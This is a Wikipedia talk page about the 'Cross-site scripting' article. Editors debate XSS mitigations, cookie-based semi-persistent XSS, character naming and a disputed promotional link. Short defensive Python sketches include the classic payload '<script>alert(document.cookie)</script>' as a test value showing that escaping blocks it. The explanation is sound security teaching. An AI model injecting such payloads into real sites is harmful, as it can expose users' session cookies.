Mozilla browsers typically have an option to allow no cookies, local cookies or all cookies. Why not have the same for Javascript? --Anteaus (talk) 20:54, 28 May 2014 (UTC)Reply[reply]

When you say, "break a lot of existing sites", the answer is "Yes, 99.99999% of them" - and there are billions of websites, so that's probably not even an exaggeration. But in any case, XSS typically becomes inline script in the vulnerable page, so disabling third-party scripts wouldn't achieve much. Carl.antuar (talk) 23:01, 24 January 2016 (UTC)Reply[reply]


I think it's worth mentioning BBCode as a solution to prevent visitors from injecting HTML tags such as <script> into their comments - something commonly used in (nearly all) modern forum software. — Preceding unsigned comment added by (talk) 15:49, 28 December 2015 (UTC)Reply[reply]
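As a sketch of that approach (a hypothetical minimal renderer, not any particular forum engine): escape all HTML first, then translate a small allowlist of BBCode tags back into markup, so raw tags such as <script> can never reach the page.

```python
import html
import re

def render_bbcode(text: str) -> str:
    """Escape all HTML, then allow only a few BBCode formatting tags."""
    escaped = html.escape(text)
    escaped = re.sub(r"\[b\](.*?)\[/b\]", r"<b>\1</b>", escaped, flags=re.S)
    escaped = re.sub(r"\[i\](.*?)\[/i\]", r"<i>\1</i>", escaped, flags=re.S)
    return escaped

# Raw tags are neutralized; BBCode formatting still works.
assert render_bbcode("[b]hi[/b] <script>alert(1)</script>") == \
    "<b>hi</b> &lt;script&gt;alert(1)&lt;/script&gt;"
```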

Cookie-based Persistent XSS[edit]

Perhaps there should be mention of so-called "semi-persistent" XSS, where the server negligently stores the payload in a cookie (or other client-side storage) that will later be used to assemble pages. Carl.antuar (talk) 23:06, 24 January 2016 (UTC)Reply[reply]
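A minimal Python sketch of that pattern (the cookie value and page are hypothetical): the payload is stored client-side by the server, then replayed into a page on a later request, so it must be encoded on every read.

```python
import html

def greeting_page(cookie_value: str, escape: bool = True) -> str:
    """Render a page from a value the server previously stored in a cookie."""
    shown = html.escape(cookie_value) if escape else cookie_value
    return f"<p>Welcome back, {shown}!</p>"

stored_name = "<script>alert(document.cookie)</script>"  # attacker-chosen 'name' value

assert "<script>" in greeting_page(stored_name, escape=False)   # replays on every visit
assert "<script>" not in greeting_page(stored_name, escape=True)
```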

Inconsistent use of "Mallory"[edit]

In some sections, "Mallory" is used as a woman's name and others it's used as a man's name. — Preceding unsigned comment added by Khatchad (talkcontribs) 16:31, 2 March 2016 (UTC)Reply[reply]

The web server could be set to redirect invalid requests[edit]

Several things could have been done to mitigate this attack:

The search input could have been sanitized, which would include proper encoding checking. The web server could be set to redirect invalid requests.

There's no invalid request here.

Khatchad (talk) 16:34, 2 March 2016 (UTC)Reply[reply]

External links modified[edit]

Hello fellow Wikipedians,

I have just modified one external link on Cross-site scripting. Please take a moment to review my edit. If you have any questions, or need the bot to ignore the links, or the page altogether, please visit this simple FaQ for additional information. I made the following changes:

When you have finished reviewing my changes, you may follow the instructions on the template below to fix any issues with the URLs.

This message was posted before February 2018. After February 2018, "External links modified" talk page sections are no longer generated or monitored by InternetArchiveBot. No special action is required regarding these talk page notices, other than regular verification using the archive tool instructions below. Editors have permission to delete these "External links modified" talk page sections if they want to de-clutter talk pages, but see the RfC before doing mass systematic removals. This message is updated dynamically through the template {{source check}} (last update: 18 January 2022).

  • If you have discovered URLs which were erroneously considered dead by the bot, you can report them with this tool.
  • If you found an error with any archives or the URLs themselves, you can fix them with this tool.

Cheers.—InternetArchiveBot (Report bug) 09:52, 9 December 2017 (UTC)Reply[reply]

Fixed a broken link - but then it was reverted by User:Jmccormac[edit]

Hey User:Jmccormac,

I saw that you reverted my edit to a broken link and noted that it was a promotional link. It wasn't meant to be promotional. It was a recent blog post that I wrote covering the cross-site scripting bug. The link in Wikipedia was broken, and in addition, when I used the Wayback Machine to check the broken link, the content was outdated and lacking important points. Important details such as the different forms of XSS, as well as the steps to mitigate the vulnerability, were missing. The blog post I replaced the broken link with covered those key points.

I did go back and review the blog post that I used to replace the broken link to figure out what might've made it 'promotional' -- It did have a form at the bottom to sign up for notifications of any future posts, which I removed this morning.

Please let me know if there are any other concerns about the article & how it might be considered promotional. If not, I'd appreciate the chance to have my replaced link stay on the article. Thanks! — Preceding unsigned comment added by X-Security-Austin (talkcontribs)

You didn't fix a broken URL (it had a working archive link, and so didn't actually need to be fixed at all); you substituted a link to a completely different source - apparently your own company website. Linking your own website is always promotional. - MrOllie (talk) 18:31, 18 November 2021 (UTC)Reply[reply]
There was a problem with it being promotional in that it was a link to your site. With Wikipedia, it is necessary for links to be notable and reliable. Even if the author is an expert on the subject, blog posts are often problematic as they may not be considered Reliable Sources in Wikipedia terms. The article could do with being kept up to date, but links have to be to what Wikipedia considers Reliable Sources. Jmccormac (talk) 19:37, 18 November 2021 (UTC)Reply[reply]